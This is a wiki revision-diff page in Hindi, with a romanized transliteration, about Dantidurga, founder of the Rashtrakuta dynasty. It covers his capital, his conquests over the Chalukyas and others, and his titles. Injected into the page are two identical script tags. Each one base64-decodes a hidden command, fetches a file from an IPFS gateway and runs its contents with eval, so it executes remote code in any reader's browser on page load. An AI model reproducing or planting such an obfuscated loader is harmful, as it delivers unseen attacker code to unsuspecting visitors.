Difference between revisions of "दन्तिदुर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*राष्ट्रकूट वंश के उत्कर्ष का प्रारम्भ दन्तिदुर्ग द्वारा हुआ।  
+
*राष्ट्रकूट वंश की स्थापना 736 ई. में दंतिदुर्ग ने की थी। राष्ट्रकूट वंश के उत्कर्ष का प्रारम्भ दन्तिदुर्ग द्वारा हुआ।  
 
*किंतु उससे पहले भी इस वंश के राज्य की सत्ता थी, यद्यपि उस समय इसका राज्य स्वतंत्र नहीं था।  
 
*किंतु उससे पहले भी इस वंश के राज्य की सत्ता थी, यद्यपि उस समय इसका राज्य स्वतंत्र नहीं था।  
 
*सम्भवतः वह [[चालुक्य साम्राज्य]] के अंतर्गत था।  
 
*सम्भवतः वह [[चालुक्य साम्राज्य]] के अंतर्गत था।  
 +
*उसने माल्यखेत या मालखंड को अपनी राजधानी बनाया। उसने [[कांची]], [[कलिंग]], [[कोशल]], श्रीशैल, [[मालवा]], लाट एवं टंक पर विजय प्राप्त कर [[राष्ट्रकूट साम्राज्य]] को विस्तृत बनाया।
 +
*उसके विषय में कहा जाता है कि उसने [[उज्जयिनी]] में हरिण्यगर्भ (महादान) यज्ञ किया था।
 +
*उसने चालुक्य नरेश कीर्तिवर्मन द्वितीय को एक युद्ध में पराजित किया था।
 +
*उसने महाराजधिराज परमेश्वर, परमभट्टारक आदि उपाधियां धारण की थी।
 +
*चालुक्य शासक विक्रमादित्य ने उसे पृथ्वी वल्लभ या खड़वालोक की उपाधि दी थी।
 
*दन्तिदुर्ग ने न केवल अपने राज्य को चालुक्यों की अधीनता से मुक्त ही किया, अपितु अपनी राजधानी [[मान्यखेट]] (मानखेट) से अन्यत्र जाकर दूर-दूर तक के प्रदेशों की विजय भी की। *उत्कीर्ण लेखों में दन्तिदुर्ग द्वारा विजित प्रदेशों में [[कांची|काञ्जी]], [[मालवा]] और लाट को अंतर्गत किया गया है।  
 
*दन्तिदुर्ग ने न केवल अपने राज्य को चालुक्यों की अधीनता से मुक्त ही किया, अपितु अपनी राजधानी [[मान्यखेट]] (मानखेट) से अन्यत्र जाकर दूर-दूर तक के प्रदेशों की विजय भी की। *उत्कीर्ण लेखों में दन्तिदुर्ग द्वारा विजित प्रदेशों में [[कांची|काञ्जी]], [[मालवा]] और लाट को अंतर्गत किया गया है।  
 
*[[कोशल]] का अभिप्राय सम्भवतः 'महाकोशल' है। महाकोशल, मालवा और लाट (गुजरात) को जीतकर वह निःसन्देह दक्षिणापथपति बन गया था, क्योंकि [[महाराष्ट्र]] में तो उसका शासन था ही।  
 
*[[कोशल]] का अभिप्राय सम्भवतः 'महाकोशल' है। महाकोशल, मालवा और लाट (गुजरात) को जीतकर वह निःसन्देह दक्षिणापथपति बन गया था, क्योंकि [[महाराष्ट्र]] में तो उसका शासन था ही।  

Revision as of 12:10, 28 October 2010

  • rashtrakoot vansh ki sthapana 736 ee. mean dantidurg ne ki thi. rashtrakoot vansh ke utkarsh ka prarambh dantidurg dvara hua.
  • kiantu usase pahale bhi is vansh ke rajy ki satta thi, yadyapi us samay isaka rajy svatantr nahian tha.
  • sambhavatah vah chaluky samrajy ke aantargat tha.
  • usane malyakhet ya malakhand ko apani rajadhani banaya. usane kaanchi, kaliang, koshal, shrishail, malava, lat evan tank par vijay prapt kar rashtrakoot samrajy ko vistrit banaya.
  • usake vishay mean kaha jata hai ki usane ujjayini mean harinyagarbh (mahadan) yajn kiya tha.
  • usane chaluky naresh kirtivarman dvitiy ko ek yuddh mean parajit kiya tha.
  • usane maharajadhiraj parameshvar, paramabhattarak adi upadhiyaan dharan ki thi.
  • chaluky shasak vikramadity ne use prithvi vallabh ya kh davalok ki upadhi di thi.
  • dantidurg ne n keval apane rajy ko chalukyoan ki adhinata se mukt hi kiya, apitu apani rajadhani manyakhet (manakhet) se anyatr jakar door-door tak ke pradeshoan ki vijay bhi ki. *utkirn lekhoan mean dantidurg dvara vijit pradeshoan mean kanji, malava aur lat ko aantargat kiya gaya hai.
  • koshal ka abhipray sambhavatah 'mahakoshal' hai. mahakoshal, malava aur lat (gujarat) ko jitakar vah niahsandeh dakshinapathapati ban gaya tha, kyoanki maharashtr mean to usaka shasan tha hi.
  • kanji ki vijay ke karan dakshini bharat ka pallav rajy bhi usaki adhinata mean a gaya tha. jo pradesh vatapi chalukyoan samratoan ki adhinata mean the, prayah ve sab ab dantidurg ke adhipaty mean a ge the.
  • dakshinapath ke kshetr mean rashtrakoot vansh chalukyoan ka uttaradhikari ban gaya tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>